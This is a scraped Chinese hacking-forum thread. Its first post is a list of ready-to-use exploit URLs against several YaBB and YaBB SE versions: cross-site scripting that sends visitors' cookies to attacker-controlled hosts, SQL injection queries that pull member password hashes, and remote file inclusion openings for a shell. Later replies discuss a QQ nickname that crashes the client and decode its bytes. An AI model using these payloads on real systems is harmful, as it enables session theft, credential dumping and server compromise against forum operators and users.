[讨论]YaBB Hack
[url=http://forum.eviloctal.com/misc.php?action=viewratings&tid=33340&pid=144381][img]http://forum.eviloctal.com/images/default/disagree.gif[/img][/url][讨论]YaBB Hack
YaBB 1 Gold
Quote:[url=http://strona.com/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=]http://strona.com/cgi-bin/YaBB/Y ... on=display&num=[/url]<script>al ert()</script>
Quote:[url=http://www.area51experience.com.ar/foro/YaBB.pl?board=gral]http://www.area51experience.com.ar/foro/YaBB.pl?board=gral[/url];action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'%2b(document.cookie)%3b</Script>
YaBB 1.2
Quote:[url=http://strona.com/yapBB/include/global.php?GLOBAL]http://strona.com/yapBB/include/global.php?GLOBAL[/url][includeBit]=1&cfgIncludeDirectory=[shell]
YaBB 1.3.2
Quote:http://[cel]/YaBB.pl?board=;action=modifycat;id=[cateogoryname];moda=Remove2
混世魔王 YABBHACK收集
YaBB 1.4.0-1.4.1
Quote:[url=http://example.com/forums/index.php?]http://example.com/forums/index.php?[/url]
board=;action=login2&user=USERNAME&cookielength=12 0&passwrd=PASSWORD<script>
window.location.href(%22[url=http://www.attackerstrona.example.com/hack.asp?%22%2Bdocument.cookie]http://www.attackerstrona.exampl ... 2%2Bdocument.cookie[/url])</script>
Quote:[url=http://www.area51experience.com.ar/foro/YaBB.pl?board=gral]http://www.area51experience.com.ar/foro/YaBB.pl?board=gral[/url];action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'
%2b(document.cookie)%3b</Script>
Quote:[url=http://www.myserver.com/yabbse/Reminder.php?]http://www.myserver.com/yabbse/Reminder.php?[/url]
searchtype=esearch&user=[yourusername]'%20or%20memberName='[otherusername]
YaBB SE 1.5.1
Quote:[glow=red);background:url(javascript:alert(document .cookie));filter:glow(color=red,2,300]Big Exploit[/glow]
[shadow=red);background:url(javascript:alert(docume nt.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]
YaBB SE 1.5.5c
Quote:http://[host]/index.php?board=&action=viewprofile&user=[sql]
YaBB SE 1.5.4, 1.5.5
Quote:http://localhost:8080/yabbse//inde
x.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f 2;action=post;threadid=1;title=Post+reply;
quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ull,null,null+FROM+yabbse_members+where+ID_ME
YaBB SE 1.5.4, 1.5.3
Quote:http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)
+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_ BOARD=t.ID_BOARD+AND+
lmr.ID_MEN+SELECT+ID_MEMBER,+
memberName,null,passwd,null,passwd,null,null,null, null,null,null+
FROM+yabbse_members+/*
Quote:http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER =1+OR+1=1)
+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_ BOARD=t.ID_BOARD+AND+lmr.ID_ME
ull,null+FROM+yabbse_members+/*
Quote:http://[target]/yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEM BER=1+OR+1=2)+GROUP+BY+readBy+UNION+SELECT+ASCII(S UBSTRING(realName,1,1)+)+
YaBB 2
Quote:[U*L]http://www.[U*L=http://wj.com/style=display:none;background:url(javascript:docum ent.images[1].src="http://strona.pl/cgi-bin/s.jpg?"+document.cookie;) ]wj[/U*L][/U*L]
YaBB SE
Quote:http://strona/forum/index.php?board='
Quote:http://strona/forum/index.php?board=1;action=display;threadid='
Quote:http://strona/forumindex.php?board=1;action=icqpager;UIN=<script >alert()</script>
Quote:http://strona/forumindex.php?board=1;action=post;threadid=1;quot e=2;title=net</title><script>alert("hacked%20by")</script>
and shell :puah[1]:
Quote:http://[cel]/yabbse/Sources/Packages.php?sourcedir=[shell] 占大哥宝地发个问题
今天看到一QQ ,说如果加上他就删除不掉,至少删除的时候会卡死,我试着加了一下,果真卡死了, QQ 599234321 ,加上之后在点删除,QQ就掉了。
[完成后可按 Ctrl+Enter 发布]最后看了下,貌似问题是在他的QQ呢称上面,“? ???发表帖子? `6钻会员?绥?????钾矑粼矒? ”貌似是行代码,但不知道怎么写上去了,在删除他的时候,提示确认窗口的删除按钮除法这个代码,然后QQ崩溃,提示重新启动 。。。。
为了确认。改了下他的备注呢称,问题解决。怎么删都没了问题,至此,确实是呢称问题。
求各位大牛看下是什么原理,给俺菜菜们科普下1 不胜感激。。fuck you
帖子8 精华[url=http://forum.eviloctal.com/digest.php?authorid=101763]0[/url] 积分15 阅读权限40 在线时间12 小时 注册时间2007-4-3 最后登录2008-6-19 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=101763]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33340&repquote=144398&extra=page%3D2&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33340&pid=144398&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=兼职&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]赚更多的钱[/url]
[url=http://forum.eviloctal.com/space-uid-152494.html]zerosoul[/url] [img]http://forum.eviloctal.com/images/avatars/10.gif[/img]
晶莹剔透§烈日灼然 引用:
原帖由 wangyan111 于 2008-6-13 06:37 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=144398&ptid=33340][img]http://forum.eviloctal.com/images/common/back.gif[/img][/url]
今天看到一QQ ,说如果加上他就删除不掉,至少删除的时候会卡死,我试着加了一下,果真卡死了, QQ 599234321 ,加上之后在点删除,QQ就掉了。
[完成后可按 Ctrl+Enter 发布]最后看了下,貌似问题是在他的QQ呢称上面,“? ???发表帖子? ...
把此人的昵称复制下来,放到winhex里面,发现有如下hex码:
0920A3E036D7EABBE1D4B1
09-Tab
20-空格
A3-|
E0-?
这个Tab只占一字节,却占很大位置,不知道他是怎么打上去的。
貌似这是把ASCII码进行巧妙的组合搞成的,挺有意思的,呵呵.
[url=http://wpa.qq.com/msgrd?V=1&Uin=86851883&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子30 精华[url=http://forum.eviloctal.com/digest.php?authorid=152494]0[/url] 积分58 阅读权限40 性别男 在线时间29 小时 注册时间2007-12-13 最后登录2008-7-10 [url=http://www.zerosoul.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=152494]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33340&repquote=144399&extra=page%3D2&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33340&pid=144399&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]
[url=http://forum.eviloctal.com/space-uid-6871.html]eemi[/url] [img]http://forum.eviloctal.com/images/avatars/pw/tm3.jpg[/img]
晶莹剔透§烈日灼然 用非官方QQ登录删除,miranda IM
[url=http://wpa.qq.com/msgrd?V=1&Uin=8952731&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子33 精华[url=http://forum.eviloctal.com/digest.php?authorid=6871]0[/url] 积分56 阅读权限40 在线时间136 小时 注册时间2005-7-4 最后登录2008-6-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=6871]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33340&repquote=144407&extra=page%3D2&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33340&pid=144407&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-101763.html]wangyan111[/url] [img]http://forum.eviloctal.com/images/avatars/pw/smile1.jpg[/img]
晶莹剔透§烈日灼然 引用:
原帖由 zerosoul 于 2008-6-13 07:01 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=144399&ptid=33340][img]http://forum.eviloctal.com/images/common/back.gif[/img][/url]
把此人的昵称复制下来,放到winhex里面,发现有如下hex码:
0920A3E036D7EABBE1D4B1
09-Tab
20-空格
A3-|
E0-?
这个Tab只占一字节,却占很大位置,不知道他是怎么打上去的。
貌似这是把ASCII码进行巧妙的组合搞成的,挺有意思的 ...
代码是看出来了,,问题是他怎么放进QQ呢称里的,,貌似放不进去那么长的代码。
,,,,
继续关注中,哪位牛大大来给俺科普下。。。。fuck you
帖子8 精华[url=http://forum.eviloctal.com/digest.php?authorid=101763]0[/url] 积分15 阅读权限40 在线时间12 小时 注册时间2007-4-3 最后登录2008-6-19 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=101763]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33340&repquote=144454&extra=page%3D2&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33340&pid=144454&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]
[url=http://forum.eviloctal.com/space-uid-2648.html]混世魔王[/url] [img]http://forum.eviloctal.com/customavatars/2648.jpg[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 用lumaQQ 看看.取保候审中........
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=26836659&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子181 精华[url=http://forum.eviloctal.com/digest.php?authorid=2648]10[/url] 积分3720 阅读权限100 性别男 在线时间88 小时 注册时间2005-3-12 最后登录2008-6-19 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=2648]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33340&repquote=144736&extra=page%3D2&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33340&pid=144736&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-67784.html]赵子岩[/url]
惟一
[img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 我也遇到相同问题。!
将是QQ的最新漏洞么?
加QQ33618096,然后把它拉入黑名单,不一会QQ就卡死掉线。
================================
昨晚跟一朋友闲聊着,给我一个QQ让我加他再把他拉入黑名单,我在傻笑,不是无聊你?
我说我昨天也拉过几个QQ进黑名单呢,说这个QQ不同,一拉就卡死掉线了...
有点好奇,加了直接拉他为黑名单还真掉线的了........我还以我朋友在玩了..看了看下
那人的QQ,如图所示:
他的昵称总就是 anxsoft版主?有留下。塃矑蔫矒?
如果从QQ资料下手的话,那就是这个昵称起到的作用。
如果他的昵称长度大大超出了QQ昵称所规定的长度...
.........................这将会是QQ的最新漏洞么?
他的原理又是怎样的呢..............?
附件
[img]http://forum.eviloctal.com/images/attachicons/image.gif[/img][url=http://forum.eviloctal.com/attachment.php?aid=11966¬humb=yes]884f7846fc7d65186b63e59d.jpg[/url] (5.63 KB)
2008-6-28 15:37
[img]http://forum.eviloctal.com/attachments/month_0806/20080628_40261001f94743f968faDnjUtQQ49kGD.jpg[/img]
[img]http://forum.eviloctal.com/images/attachicons/image.gif[/img][url=http://forum.eviloctal.com/attachment.php?aid=11967¬humb=yes]bc46a762d4003ecce7113aa8.jpg[/url] (113.58 KB)
2008-6-28 15:37
[img]http://forum.eviloctal.com/attachments/month_0806/20080628_f92df985b77f43550074gaGuEPGDNXK5.jpg[/img]
帖子110 精华[url=http://forum.eviloctal.com/digest.php?authorid=67784]2[/url] 积分291 阅读权限40 在线时间62 小时 注册时间2006-10-22 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=67784]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33340&repquote=145132&extra=page%3D2&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33340&pid=145132&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-159590.html]slyar[/url] [img]http://forum.eviloctal.com/images/avatars/14.gif[/img]
晶莹剔透§烈日灼然
页:
[1]